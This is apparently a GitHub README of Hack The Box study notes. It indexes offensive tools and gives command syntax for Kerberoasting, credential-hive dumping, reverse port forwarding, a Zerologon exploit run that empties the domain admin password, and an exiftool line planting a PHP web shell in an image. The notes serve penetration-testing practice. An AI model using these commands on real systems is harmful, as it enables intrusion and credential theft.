Skip to content

b33pl0g1c/hackthebox

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

hackthebox

License: MIT

Notes Taken for HTB Machine
Will be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams

created & maintained by: cyberwr3nch

Contents

Commands Reference

File Contents
Active Directory Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcclinet
Directory Enumeration gobuster, rustbuster, wfuzz, vhosts
File Transfer ftp, python, netcat, http, powershell curling, metasploit, smb, net use, impackets
Nmap Nmap, PortScanning, Tags
Notes DNS Recon, 302 Redirects, Burpsuite, MySQL, Passwd File, Port Forwarding
Password Cracking hashcat, john, hashexamples, zip file cracking
Post Exploitation current user, network infos, locate, Antivirus Disabling, registry, priviledges, running process, plink, stored credentials, wmic
Regular Commands ls, Grep, AWK, Curl, wget, Compression and decompression of files, Find, xclip, Misc, bashLoops, sed, tr, tail, watch
Reverse Shells Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, Powershell, AWK, TCLsh, Java, LUA, MSF Reverse Shells(war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, Magicbytes, Exiftool, Simple PHP oneliners
Web Attacks sql-injection, login bruteforce( wfuzz, hydra)
Docker Commands installation, building, pulling, updating, deleting, listing, cheatsheet
Git Commands clone, commit, push, pull, add, log, deleted file, checkout

Tools

Windows and Active Directory

Tool Use Command Syntax
Bloodhound.py BloodHound written in python. Used to obtain AD infromations from a windows machine python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all
Impackets Swiss Knife for most Windows AD attacks python GetNPUsers.py <domain_name>/ -usersfile <users_file> = ASREPRoasting
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> = Kerberoasting
Kerbrute A tool written in GO to enumerate AD users ./kerbrute userenum --dc <machine ip> -d <doaminname> <users_file>
CredDump Used to obtain Cached Credentials, LSA Secrets and Password hash when system and sam files are available ./pwdump.py <system hive> <sam hive> = Obtain Password Credentials
./cachedump.py <system hive> <sam hive> = obtain cached credentials
./lsadum.py <system hive> <sam hive> = Obtain LSA Dumps
PwdDump After getting the administrative access, running this will get the password hashes .\PwDump7.exe
ApacheDirectoryStudio LDAP browser which is used to analyze LDAP instance running on linux (CREDS required), here transferring the LDAP running on a victim machine and accessing it in the attacker machine sudo ssh -L 389:172.20.0.10:389 [email protected]

Port Forwarding

Tool Use Command Syntax
Chisel Used to forward a service running on a port in the victim machine ./chisel server -p <port no.> --revserse = on the attacker machine
./chisel client <attackerip:port> R:1234:127.0.0.1:1121 = Forwards the service running on port 1121 to the port 1234 on attackers machine
socat Swiss Knife for Port forwarding socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port> = Listens on every connection to port 8000 and forwards to the machineIP and its port
socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port> = forward all incoming requests to the port 9002 from to the localhost port, reuseaddr is used to specify socat use the address (eg. localhost) even if its used by other services
plink SSH Putty in CLI mode .\plink.exe <user@host> -R <remote port>:<localhost>:<local port> .\plink.exe [email protected] -R 8888:127.0.0.1:8888 = port forwards the service running on victim machines port 8888 to the attacker machines 8888

Directory Enumeration

Tool Use Command Syntax
DirSearch Directory enumeration Tool python3 dirsearch.py -u <url> -e <extn>
Gobuster Directory enumeration tool written in GO gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads>
RustBuster Direcotry Enumeration tool written in rust rustbuster dir -u <url> -w <wordlist> -e <extn>

Post Exploitation

Tool Use Command Syntax
LinEnum Post Enumeration scripts that automates enumeration ./LinEnum.sh
LinPeas Post Enumeration Script ./linpeas.sh
WinPEASbat/WinPEASexe Windows post enumeration script and exe .\winPEAS.bat

Misc

Tool Use Command Syntax
Exiftool Inspects the meta data of the image, Injects php payload in the comment section for file upload vulns, which can be added double extension file.php.ext ./exiftool -Comment='<?php system($_GET['cmd']); ?>' <image.ext>
Git Dumper Dump the Github repo if found in website ./git-dumper.py <website/.git> <output folder>
lxd-alpine builder When a victim machine is implemented with lxc the privesc is done with this article here
Php-reverse-shell Php reverse shell, when an upload is possible change the IP and make req to obtain reverse shell
ZerologonPOC CVE-2020-1472 Exploit, sets the domain admin password as empty pass and dump the secrets. PS: Latest Version of Impackets is required python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\$@machineip
Gopherus SSRF with gopher:// protocol gophreus --exploit phpmemcache

SAY NO TO MSF !

Admired Bloggers

These are the urls that has the writeups for active and retired machines

nvm this

Constantly updating from MAY 3rd 2020

Thanks for visiting

A noob cyberwr3nch🔧 A member of TCSC Learn and Spread <3 xoxo💙

Support My contents

Dhanesh Sivasamy's Twitter

About

Notes Taken for HTB Machine

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 40.0%
  • Perl 35.5%
  • HTML 18.7%
  • C# 3.2%
  • Shell 0.9%
  • XSLT 0.7%
  • Other 1.0%